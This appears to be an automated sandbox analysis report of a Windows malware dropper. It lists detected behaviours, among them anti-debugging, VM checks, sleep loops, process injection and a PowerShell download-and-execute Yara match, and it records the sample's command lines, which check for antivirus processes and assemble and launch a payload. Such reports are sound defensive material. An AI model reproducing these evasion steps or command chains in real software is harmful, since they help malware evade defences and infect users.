Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Window / User API: threadDelayed 501			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Window / User API: threadDelayed 9487			Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Evaded block: after key decision

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	API coverage: 1.5 %
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API coverage: 6.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep count: 501 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep time: -356211s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep count: 9487 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif TID: 8064	Thread sleep time: -6745257s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Last function: Thread delayed

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00114005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00114005
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE26E Process32NextW,SetFileTime,GetFileAttributesW,FindFirstFileW,__floor_pentium4,GetShortPathNameW,DeleteFileW,__floor_pentium4,	15_2_000BE26E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011C2FF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011494A GetFileAttributesW,FindFirstFileW,FindClose,	15_2_0011494A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD14 FindFirstFileW,FindClose,	15_2_0011CD14
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	15_2_0011CD9F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F5D8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	15_2_0011F735
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0011FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	15_2_0011FA36
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00113CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	15_2_00113CE2
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	16_2_00414570
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_00414910
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	16_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	16_2_022AE697
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	16_2_022B3B17
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022B4B77
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	16_2_022AEF87
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	16_2_022B47D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AE077
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	16_2_022ADCE7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	16_2_022AC0D7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022A1937
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	16_2_022B4107
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	16_2_022AF917

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000C5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,

15_2_000C5D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.19.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001333000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Welding.pif, 0000000F.00000002.4150963294.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000828000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: Amcache.hve.19.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.19.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.19.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_001245D5 BlockInput,

15_2_001245D5

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000D8E89 _memset,IsDebuggerPresent,

15_2_000D8E89

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000E5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

15_2_000E5CAC

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Code function: 16_2_004045C0 VirtualProtect ?,00000004,00000100,00000000

16_2_004045C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00430EDF mov eax, dword ptr fs:[00000030h]	15_2_00430EDF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00419750 mov eax, dword ptr fs:[00000030h]	16_2_00419750
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E2CEF push dword ptr fs:[00000030h]	16_2_007E2CEF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A092B mov eax, dword ptr fs:[00000030h]	16_2_022A092B
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B99B7 mov eax, dword ptr fs:[00000030h]	16_2_022B99B7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022A0D90 mov eax, dword ptr fs:[00000030h]	16_2_022A0D90

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_001088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

15_2_001088CD

Enables debug privileges

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DA354 SetUnhandledExceptionFilter,	15_2_000DA354
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000DA385
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000F66CF GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,	15_2_000F66CF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000F66DF GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,	15_2_000F66DF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0 CopySid,LogonUserW,GetSecurityDescriptorDacl,AddAce,ShellExecuteW,ExtractIconExW,SHGetDesktopFolder,SHCreateShellItem,SHBrowseForFolderW,ShellExecuteExW,DragQueryPoint,StringFromGUID2,CoCreateInstance,CoUninitialize,EncodePointer,GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,GetConsoleMode,RtlUnwind,FreeEnvironmentStringsW,SetEnvironmentVariableA,_memmove,	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0 CopySid,LogonUserW,GetSecurityDescriptorDacl,AddAce,ShellExecuteW,ExtractIconExW,SHGetDesktopFolder,SHCreateShellItem,SHBrowseForFolderW,ShellExecuteExW,DragQueryPoint,StringFromGUID2,CoCreateInstance,CoUninitialize,EncodePointer,GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,GetConsoleMode,RtlUnwind,FreeEnvironmentStringsW,SetEnvironmentVariableA,_memmove,	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042B383 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0042B383
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411483 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00411483
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411616 SetUnhandledExceptionFilter,	15_2_00411616
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004108BA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_004108BA
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0041AD48
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041CEEA SetUnhandledExceptionFilter,	16_2_0041CEEA
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_0041B33A
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_022BAFAF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BD151 SetUnhandledExceptionFilter,	16_2_022BD151
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_022BB5A1

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Memory written: C:\Users\user\AppData\Local\Temp\773416\Welding.pif base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		16_2_00419600
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		16_2_022B9867

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00109369 LogonUserW,

15_2_00109369

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

15_2_000C5240

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00111AC6 SendInput,keybd_event,

15_2_00111AC6

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000BEC83 VkKeyScanW,GetKeyboardState,GetMenuItemID,CheckMenuRadioItem,DeleteMenu,GetCursorPos,SetMenuDefaultItem,SetActiveWindow,mouse_event,CreateIconFromResourceEx,MonitorFromRect,CharLowerBuffW,UnregisterHotKey,LockWindowUpdate,BlockInput,

15_2_000BEC83

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
